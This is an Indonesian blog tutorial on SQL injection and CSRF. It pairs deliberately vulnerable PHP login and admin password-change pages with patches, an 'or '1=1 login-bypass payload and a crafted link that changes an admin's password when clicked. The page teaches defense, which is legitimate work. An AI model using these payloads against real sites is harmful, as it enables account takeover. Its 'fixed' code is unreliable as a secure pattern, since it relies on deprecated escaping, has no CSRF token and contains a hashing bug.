<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">SQL injection adalah salah satu teknik yang cukup tua untuk dibahas, celah ini pada web aplikasilah yang paling banyak memberikan andil kepada terkuasainya banyak webserver. Celah ini bisa saya bilang multiplatform karena bisa Database dapat berpasangan dengan bahasa permrograman apapun dan berjalan di sistem-operasi apapun.<br />
Untuk teknik ini saya tidak ingin panjang lebar, tetapi khusus untuk celah lawas ini, kode yang akan saya berikan lengkap, dan bagi para pencinta &#8220;salin &amp; tempel&#8221; akan dengan mudah dapat mengapliaksikannya, hmm sepertinya tidak juga, karena setidaknya kamu harus paham database, membuat tabel dan mengkoneksikannyadengan php<br />
Ok, berikut adalah kode yang telah memiliki tempat sendiri dalam sejarah keamanan aplikasi web <img src='http://www.james0baster.web.id/v2/wp-includes/images/smilies/icon_lol.gif' alt=':lol:' class='wp-smiley' /> </span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;&#8211;//vulnlogin.php</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">PHP Code:</span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">&lt;table&gt;&lt;form name=&#8221;member&#8221; method=&#8221;post&#8221; action=&#8221;#&#8221;&gt;&lt;tr&gt;&lt;td colspan=&#8221;2&#8243;&gt;&lt;b&gt;Member Login&lt;/b&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Username&lt;/td&gt;&lt;td&gt;&lt;input type=&#8221;text&#8221; name=&#8221;username&#8221; value=&#8221;" size=&#8221;40&#8243;&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Password&lt;/td&gt;&lt;td&gt;&lt;input type=&#8221;password&#8221; name=&#8221;password&#8221; value=&#8221;" size=&#8221;40&#8243;&gt;&lt;/tr&gt;<br />
&lt;tr&gt;&lt;td colspan=&#8221;2&#8243;&gt;&lt;input type=&#8221;submit&#8221; name=&#8221;submit&#8221; value=&#8221;Submit&#8221;&gt;&lt;input type=&#8221;reset&#8221; name=&#8221;reset&#8221; value=&#8221;Reset&#8221;&gt;&lt;/td&gt;&lt;/form&gt;&lt;/table&gt;<br />
&lt;?phpinclude &#8216;config.php&#8217;; // ini adalah konfigurasi koneksi aplikasi ke database,ga bisa buat? <img src='http://www.james0baster.web.id/v2/wp-includes/images/smilies/icon_lol.gif' alt=':lol:' class='wp-smiley' /><br />
$username = $_POST['username'];$password = $_POST['password'];<br />
$q = &#8220;SELECT username, password FROM member WHERE username = &#8216;$username&#8217; AND \password = &#8216;$password&#8217; &#8220;;<br />
$r = mysql_query($q);if (!$r) {print mysql_error();} else {$row = mysql_fetch_row($r);if (($row[0] != &#8220;&#8221<img src="http://www.james0baster.web.id/v2/wp-content/plugins/kaskus-emoticons/emoticons/13.gif" style="border:none;background:none;" alt=";)" /> &amp;&amp; ($row[1] != &#8220;&#8221<img src="http://www.james0baster.web.id/v2/wp-content/plugins/kaskus-emoticons/emoticons/13.gif" style="border:none;background:none;" alt=";)" />) {echo &#8220;&amp;nbsp;&amp;nbsp;&lt;a href=somerandompagesnameforyou.php&gt;Yeah, you are in!&lt;/a&gt;&#8221;;} else {echo&#8221;&lt;pre&gt; &amp;nbsp;&amp;nbsp;You need to register as a member to login! &lt;/pre&gt;&#8221;;}}<br />
?&gt;</span></p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;&#8211;//</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">dan untuk mengamankannya adalah dengan melakukan filtering pada keduavariabel &#8220;username&#8221; dan &#8220;password&#8221;<br />
PHP Code:$username = stripslashes($username);$username = mysql_escape_string($username);$password = stripslashes($password);$password = mysql_real_escape_string($password);|&#8212;-| Untuk memperkuatnya, seandainya ada yang terlewat, melakukan setting| &#8220;On&#8221; untuk| magic_quotes_gpc| pada setting PHP.ini|&#8212;-</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;// Eksploitasi \\&#8212;&#8212;</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">Masukkan &#8216;or &#8216;1=1&#8221; (l33t) pada input box username/password untuk membypasslogin, sehingga rikues akan jadi seperti ini<br />
|&#8212;-|<br />
PHP Code:SELECT username, password FROM member WHERE username = &#8221;or&#8217;1=1&#8221;&#8217; AND password = &#8221;or&#8217;1=1&#8221;&#8217;|&#8212;<br />
Selanjutnya, anda simpulkan sendiri</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
===// Cross Site Requesr Forgery \\===</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">Kode berikut adalah mempertunjukkan sebuah halaman ganti password untuk admin, yang tidak melakukan pemeriksaan password saat ini, sehingga memungkinkan celah CSRF digunakan.</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;&#8211;\\ganti.php</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">PHP Code:</span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">&lt;?php<br />
if (isset($_GET['ganti'])) {$pwd_baru = $_GET['pwd_baru'];$pwd_baru2 = $_GET['pwd_baru2'];<br />
if (($pwd_baru == $pwd_baru2)){$pwd_baru = mysql_real_escape_string($pwd_baru);$pwd_baru = md5($pwd_baru);<br />
$insert=&#8221;UPDATE `users` SET pwd = &#8216;$pwd_baru&#8217; WHERE user = &#8216;admin&#8217;;&#8221;;$result=mysql_query($insert) or die(&#8216;&lt;pre&gt;&#8217; . mysql_error() . &#8216;&lt;/pre&gt;&#8217; );<br />
echo &#8220;&lt;pre&gt;Password Admin Berubah &lt;/pre&gt;&#8221;;mysql_close();}else{echo &#8220;&lt;pre&gt; Password tidak cocok. &lt;/pre&gt;&#8221;;}<br />
}?&gt;</span></p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">&#8212;&#8212;&#8211;//<br />
Adapun untuk memperbaikinya adalah, dengan melakukan pemeriksaan password saat ini terlebih dahulu sebelum merubah password</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;&#8211;\\ganti-patch.php</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">PHP Code:</span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">&lt;?php<br />
if (isset($_GET['ganti'])) {$pwd = $_GET['pwd'];$pwd_baru = $_GET['pwd_baru'];$pwd_baru2 = $_GET['pwd_baru2'];<br />
$pwd = stripslashes( $pwd );$pwd = mysql_real_escape_string( $pwd );$pwd = md5( $pwd );<br />
// Periksa password saat ini (pwd)$qry = &#8220;SELECT pwd FROM `users` WHERE user=&#8217;admin&#8217; AND pwd=&#8217;$pwd&#8217;;&#8221;;$result = mysql_query($qry) or die(&#8216;&lt;pre&gt;&#8217; . mysql_error() . &#8216;&lt;/pre&gt;&#8217; );<br />
if (($pwd_baru == $pwd_baru2) &amp;&amp; ( $result &amp;&amp; mysql_num_rows( $result ) == 1 )){$pwd_baru = mysql_real_escape_string($pwd_baru);$pass_new = md5($pwd_baru);<br />
$insert=&#8221;UPDATE `users` SET pwd = &#8216;$pwd_baru&#8217; WHERE user = &#8216;admin&#8217;;&#8221;;$result=mysql_query($insert) or die(&#8216;&lt;pre&gt;&#8217; . mysql_error() . &#8216;&lt;/pre&gt;&#8217; );<br />
echo &#8220;&lt;pre&gt; Password Admin Berubah &lt;/pre&gt;&#8221;;mysql_close();}<br />
else{echo &#8220;&lt;pre&gt; Passwords Baru tidak cocok atau password lama anda salah. &lt;/pre&gt;&#8221;;}<br />
}?&gt;</span></p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">&#8212;&#8212;&#8212;//</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;// Eksploitasi \\&#8212;&#8212;</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">Adapun cara eksploitasinya adalah melibatkan kelalaian sang admin, umumnya attacker akan mengirim link tersbut ke email, atau melalui forum dsb dengan harapan sang admin akan meng-click-nya.<br />
Code:&lt;a href=http://nice.ang.el/ganti.php?pwd=&amp;pwd_baru=dudul&amp;pwd_baru2=dudul&amp;ganti=ganti#&gt;klik saya&lt;/a&gt;</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">===// Penutup \\===</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">Oke, saya harap anda semua yang membaca akan pusing, dan disinilah orang-orang terpilih akan mengikis pembaca lainnya, yup, dengan cepat anda akan segera mencoba dan mencari tahu apa yang saya tulis disini, google! sejak awal di luncurkan adalah referensi terbaik.<br />
Pelajari berbagai fungsi-fungsi yang saya singgung diatas, secara pelan dan jangan terburu-buru , selebihnya selamat datang di dunia web aplikasi yang &#8216;penuh dengan intrik-intrik, dan semoga sedikit dari saya dapat bermanfaat untuk semua. Logika anda sangat di perlukan disini!</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
===// Reference \\===</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">[1].google.inc,</span><span style="font-size: 10.0pt; mso-bidi-font-size: 11.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"> </span><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><span style="mso-bidi-font-size: 11.0pt; color: blue;"><a href="http://google.com" target="_self">http://google.com</a></span></span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><span style="mso-bidi-font-size: 11.0pt; color: blue;"><a href="http://google.com" target="_self"></a><span style="color: #000000;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">[2].OWASP, &#8220;The Open Web Application Security Project&#8221;,</span><span style="font-size: 10.0pt; mso-bidi-font-size: 11.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"> </span><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><a href="http://owasp.org"><span style="mso-bidi-font-size: 11.0pt; color: blue;">http://owasp.org</span></a></span></span></span></span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">[3].semua web aplikasi yang telah saya lihat kode php-nya</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">Copas dari</span><span style="font-size: 10.0pt; mso-bidi-font-size: 11.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"> </span><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><a href="http://ezine.echo.or.id/ezine21/e21_005.txt" target="_self"><span style="mso-bidi-font-size: 11.0pt; color: blue;">http://ezine.echo.or.id/ezine21/e21_005.txt</span></a><br />
dan diambil dari</span><span style="font-size: 10.0pt; mso-bidi-font-size: 11.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"> </span><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><a href="http://www.indonesianhacker.org/showthread.php?t=529" target="_self"><span style="mso-bidi-font-size: 11.0pt; color: blue;">sumber</span></a></span><span style="font-size: 10.0pt; mso-bidi-font-size: 11.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"> </span><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">.<br />
Semoga bermanfaat.</span></p>
<p class="MsoNormal">
</div>
<p class="facebook"><a href="http://www.facebook.com/share.php?u=http://www.james0baster.web.id/v2/web-security-yin-yang-attacking-defending/" target="_blank" title="Share on Facebook">Share on Facebook</a></p>

<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-caring-old">
<ul class="socials">
		<li class="shr-blogger">
			<a href="http://www.blogger.com/blog_this.pyra?t&amp;u=http://www.james0baster.web.id/v2/web-security-yin-yang-attacking-defending/&amp;n=Web+Security+Yin-Yang+%28Attacking+%26+Defending%29&amp;pli=1" rel="nofollow" class="external" title="Blog this on Blogger">Blog this on Blogger</a>
		</li>
		<li class="shr-comfeed">
			<a href="http://www.james0baster.web.id/v2/web-security-yin-yang-attacking-defending/feed" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="shr-delicious">
			<a href="http://delicious.com/post?url=http://www.james0baster.web.id/v2/web-security-yin-yang-attacking-defending/&amp;title=Web+Security+Yin-Yang+%28Attacking+%26+Defending%29" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-digg">
			<a href="http://digg.com/submit?phase=2&amp;url=http://www.james0baster.web.id/v2/web-security-yin-yang-attacking-defending/&amp;title=Web+Security+Yin-Yang+%28Attacking+%26+Defending%29" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-diigo">
			<a href="http://www.diigo.com/post?url=http://www.james0baster.web.id/v2/web-security-yin-yang-attacking-defending/&amp;title=Web+Security+Yin-Yang+%28Attacking+%26+Defending%29&amp;desc=%0D%0AWEB%20SECURITY%20YIN-YANG%0D%0ADitulis%20oleh%3A%20gentoo%2C%20foobar4joo%40gmail.com%0D%0A%22If%20you%20know%20both%20yourself%20and%20your%20enemy%2C%20you%20can%20win%20a%20hundred%20battles%20without%20a%20single%20loss.%22%0D%0ADi%20berbagai%20segi%20kehidupan%2C%20sangatlah%20di%20butuhkan%20keseimbangan.%20Bahkan%20yang%20sangat%20terkenal%20adalah%20sebuah%20ungkapan%20dari%20Sun%20Tzu%20yang%20" rel="nofollow" class="external" title="Post this on Diigo">Post this on Diigo</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://www.james0baster.web.id/v2/web-security-yin-yang-attacking-defending/&amp;t=Web+Security+Yin-Yang+%28Attacking+%26+Defending%29" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-gmail">
			<a href="https://mail.google.com/mail/?ui=2&amp;view=cm&amp;fs=1&amp;tf=1&amp;su=Web+Security+Yin-Yang+%28Attacking+%26+Defending%29&amp;body=Link: http://www.james0baster.web.id/v2/web-security-yin-yang-attacking-defending/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A %0D%0AWEB%20SECURITY%20YIN-YANG%0D%0ADitulis%20oleh%3A%20gentoo%2C%20foobar4joo%40gmail.com%0D%0A%22If%20you%20know%20both%20yourself%20and%20your%20enemy%2C%20you%20can%20win%20a%20hundred%20battles%20without%20a%20single%20loss.%22%0D%0ADi%20berbagai%20segi%20kehidupan%2C%20sangatlah%20di%20butuhkan%20keseimbangan.%20Bahkan%20yang%20sangat%20terkenal%20adalah%20sebuah%20ungkapan%20dari%20Sun%20Tzu%20yang%20" rel="nofollow" class="external" title="Email this via Gmail">Email this via Gmail</a>
		</li>
		<li class="shr-googlebookmarks">
			<a href="http://www.google.com/bookmarks/mark?op=add&amp;bkmk=http://www.james0baster.web.id/v2/web-security-yin-yang-attacking-defending/&amp;title=Web+Security+Yin-Yang+%28Attacking+%26+Defending%29" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.google.com/buzz/post?url=http://www.james0baster.web.id/v2/web-security-yin-yang-attacking-defending/&amp;imageurl=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
		<li class="shr-googlereader">
			<a href="http://www.google.com/reader/link?url=http://www.james0baster.web.id/v2/web-security-yin-yang-attacking-defending/&amp;title=Web+Security+Yin-Yang+%28Attacking+%26+Defending%29&amp;srcUrl=http://www.james0baster.web.id/v2/web-security-yin-yang-attacking-defending/&amp;srcTitle=Web+Security+Yin-Yang+%28Attacking+%26+Defending%29&amp;snippet=%0D%0AWEB%20SECURITY%20YIN-YANG%0D%0ADitulis%20oleh%3A%20gentoo%2C%20foobar4joo%40gmail.com%0D%0A%22If%20you%20know%20both%20yourself%20and%20your%20enemy%2C%20you%20can%20win%20a%20hundred%20battles%20without%20a%20single%20loss.%22%0D%0ADi%20berbagai%20segi%20kehidupan%2C%20sangatlah%20di%20butuhkan%20keseimbangan.%20Bahkan%20yang%20sangat%20terkenal%20adalah%20sebuah%20ungkapan%20dari%20Sun%20Tzu%20yang%20" rel="nofollow" class="external" title="Add this to Google Reader">Add this to Google Reader</a>
		</li>
		<li class="shr-hackernews">
			<a href="http://news.ycombinator.com/submitlink?u=http://www.james0baster.web.id/v2/web-security-yin-yang-attacking-defending/&amp;t=Web+Security+Yin-Yang+%28Attacking+%26+Defending%29" rel="nofollow" class="external" title="Submit this to Hacker News">Submit this to Hacker News</a>
		</li>
		<li class="shr-hotmail">
			<a href="http://mail.live.com/?rru=compose?subject=Web+Security+Yin-Yang+%28Attacking+%26+Defending%29&amp;body=Link: http://www.james0baster.web.id/v2/web-security-yin-yang-attacking-defending/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A %0D%0AWEB%20SECURITY%20YIN-YANG%0D%0ADitulis%20oleh%3A%20gentoo%2C%20foobar4joo%40gmail.com%0D%0A%22If%20you%20know%20both%20yourself%20and%20your%20enemy%2C%20you%20can%20win%20a%20hundred%20battles%20without%20a%20single%20loss.%22%0D%0ADi%20berbagai%20segi%20kehidupan%2C%20sangatlah%20di%20butuhkan%20keseimbangan.%20Bahkan%20yang%20sangat%20terkenal%20adalah%20sebuah%20ungkapan%20dari%20Sun%20Tzu%20yang%20" rel="nofollow" class="external" title="Email this via Hotmail">Email this via Hotmail</a>
		</li>
		<li class="shr-mail">
			<a href="mailto:?subject=%22Web%20Security%20Yin-Yang%20%28Attacking%20%26%20Defending%29%22&amp;body=Link: http://www.james0baster.web.id/v2/web-security-yin-yang-attacking-defending/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A %0D%0AWEB%20SECURITY%20YIN-YANG%0D%0ADitulis%20oleh%3A%20gentoo%2C%20foobar4joo%40gmail.com%0D%0A%22If%20you%20know%20both%20yourself%20and%20your%20enemy%2C%20you%20can%20win%20a%20hundred%20battles%20without%20a%20single%20loss.%22%0D%0ADi%20berbagai%20segi%20kehidupan%2C%20sangatlah%20di%20butuhkan%20keseimbangan.%20Bahkan%20yang%20sangat%20terkenal%20adalah%20sebuah%20ungkapan%20dari%20Sun%20Tzu%20yang%20" rel="nofollow" class="external" title="Email this to a friend?">Email this to a friend?</a>
		</li>
		<li class="shr-misterwong">
			<a href="http://www.mister-wong.com/addurl/?bm_url=http://www.james0baster.web.id/v2/web-security-yin-yang-attacking-defending/&amp;bm_description=Web+Security+Yin-Yang+%28Attacking+%26+Defending%29&amp;plugin=sexybookmarks" rel="nofollow" class="external" title="Add this to Mister Wong">Add this to Mister Wong</a>
		</li>
		<li class="shr-mixx">
			<a href="http://www.mixx.com/submit?page_url=http://www.james0baster.web.id/v2/web-security-yin-yang-attacking-defending/&amp;title=Web+Security+Yin-Yang+%28Attacking+%26+Defending%29" rel="nofollow" class="external" title="Share this on Mixx">Share this on Mixx</a>
		</li>
		<li class="shr-myspace">
			<a href="http://www.myspace.com/Modules/PostTo/Pages/?u=http://www.james0baster.web.id/v2/web-security-yin-yang-attacking-defending/&amp;t=Web+Security+Yin-Yang+%28Attacking+%26+Defending%29" rel="nofollow" class="external" title="Post this to MySpace">Post this to MySpace</a>
		</li>
		<li class="shr-plurk">
			<a href="http://www.plurk.com/m?content=Web+Security+Yin-Yang+%28Attacking+%26+Defending%29+-+http://www.james0baster.web.id/v2/web-security-yin-yang-attacking-defending/&amp;qualifier=shares" rel="nofollow" class="external" title="Share this on Plurk">Share this on Plurk</a>
		</li>
		<li class="shr-reddit">
			<a href="http://reddit.com/submit?url=http://www.james0baster.web.id/v2/web-security-yin-yang-attacking-defending/&amp;title=Web+Security+Yin-Yang+%28Attacking+%26+Defending%29" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://www.james0baster.web.id/v2/web-security-yin-yang-attacking-defending/&amp;title=Web+Security+Yin-Yang+%28Attacking+%26+Defending%29" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-technorati">
			<a href="http://technorati.com/faves?add=http://www.james0baster.web.id/v2/web-security-yin-yang-attacking-defending/" rel="nofollow" class="external" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="shr-twitter">
			<a href="http://twitter.com/home?status=Web+Security+Yin-Yang+%28Attacking+%26+Defending%29+-+http://bit.ly/fjMTDs&amp;source=shareaholic" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-yahoobuzz">
			<a href="http://buzz.yahoo.com/submit/?submitUrl=http://www.james0baster.web.id/v2/web-security-yin-yang-attacking-defending/&amp;submitHeadline=Web+Security+Yin-Yang+%28Attacking+%26+Defending%29&amp;submitSummary=%0D%0AWEB%20SECURITY%20YIN-YANG%0D%0ADitulis%20oleh%3A%20gentoo%2C%20foobar4joo%40gmail.com%0D%0A%22If%20you%20know%20both%20yourself%20and%20your%20enemy%2C%20you%20can%20win%20a%20hundred%20battles%20without%20a%20single%20loss.%22%0D%0ADi%20berbagai%20segi%20kehidupan%2C%20sangatlah%20di%20butuhkan%20keseimbangan.%20Bahkan%20yang%20sangat%20terkenal%20adalah%20sebuah%20ungkapan%20dari%20Sun%20Tzu%20yang%20&amp;submitCategory=science&amp;submitAssetType=text" rel="nofollow" class="external" title="Buzz up!">Buzz up!</a>
		</li>
		<li class="shr-yahoomail">
